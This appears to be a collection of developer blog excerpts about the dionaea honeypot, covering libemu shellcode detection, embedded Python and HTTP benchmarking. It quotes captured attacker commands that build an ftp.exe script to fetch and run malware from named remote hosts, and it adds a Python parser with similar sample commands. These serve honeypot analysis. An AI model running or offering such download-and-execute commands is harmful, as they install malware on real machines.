We got a new milestone due:
stream recording works
shellcode detection using libemu works
shellcode emulation using libemu works
compiles on Linux & OpenBSD
An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.
The core functionality in dionaea is written in C, but Python is embedded as a scripting language, and the required parts of the C API are exported to the embedded Python using Cython bindings.
Yesterday, I got an incomplete, but successful, attack on my honeypot; the attacker's remote code execution looked like this:
WinExec("cmd /c echo open 188.8.131.52 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
As the required part to download the malware to the remote host was incomplete, I got curious and wanted a copy.
I did not expect downloading the malware to become a problem, as all information required was available, including host credentials and filename.
While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
The offer to download something was not that unexpected; we are working hard to get these offers so we can grab copies of something, but the location was interesting.
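Both captured commands above build an ftp.exe script with echo redirections, and the first one stops before ftp is ever started. The following added example (not dionaea's own code) replays those echo steps and recovers host, port, credentials and filenames, flagging whether the script was actually handed to ftp; the function names and the sample command lines are assumptions constructed for illustration.

```python
import re

ECHO = re.compile(r"\s*(?:cmd\s+/c\s+)?echo\s+(.*?)\s*(>>?)\s*(\S+)\s*$", re.I)
FTP_RUN = re.compile(r"\s*ftp\b.*?-s:(\S+)", re.I)

# Constructed samples modelled on the two command forms shown above.
COMPLETE = ("cmd /c echo open files.example.test 2121 > i&echo user u1 p1 >> i "
            "&echo binary >> i &echo get sample.exe >> i &echo quit >> i "
            "&ftp -n -s:i &sample.exe")
TRUNCATED = "cmd /c echo open 192.0.2.10 2121 > o&echo user 1 1 >> o &echo get sample.exe >> o"

def replay_echo_steps(cmdline):
    """Return ({script file: [lines]}, {script files passed to ftp -s:})."""
    scripts, executed = {}, set()
    for step in cmdline.split("&"):
        echo, run = ECHO.match(step), FTP_RUN.match(step)
        if echo:
            text, redirect, name = echo.groups()
            if redirect == ">":  # '>' truncates the file, '>>' appends to it
                scripts[name] = []
            scripts.setdefault(name, []).append(text)
        elif run:
            executed.add(run.group(1))
    return scripts, executed

def parse_ftp_script(lines):
    """Pull the download parameters out of reconstructed ftp script lines."""
    info = {"host": None, "port": 21, "user": None, "password": None, "files": []}
    for line in lines:
        verb, *args = line.split() or [""]
        verb = verb.lower()
        if verb == "open" and args:
            info["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                info["port"] = int(args[1])
        elif verb == "user" and args:
            info["user"] = args[0]
            info["password"] = args[1] if len(args) > 1 else None
        elif verb == "get" and args:
            info["files"].append(args[0])
    return info

def extract_downloads(cmdline):
    """One record per reconstructed script; executed=False marks a truncated attack."""
    scripts, executed = replay_echo_steps(cmdline)
    return [dict(parse_ftp_script(lines), script=name, executed=name in executed)
            for name, lines in scripts.items()]

if __name__ == "__main__":
    for sample in (COMPLETE, TRUNCATED):
        print(extract_downloads(sample))
```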
Due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as a unique abbreviation. Things are rolling for the project: writing code has started, and a basic homepage with instructions on how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.
As the plan is to embed Python as a scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a C core which accepts connections and allows Python to deal with the input. The protocol used for benchmarking is HTTP; the service serves a non-static HTML page.
2.6.2 (release26-maint, Apr 19 2009, 02:15:38)
3.0.1+ (r301:69556, Apr 15 2009, 17:22:45)
3.1a1+ (py3k, Mar 30 2009, 02:02:26)
To benchmark, I ran the Apache benchmark tool ab
ab -n 100000 -c 15 http://localhost:8080/bar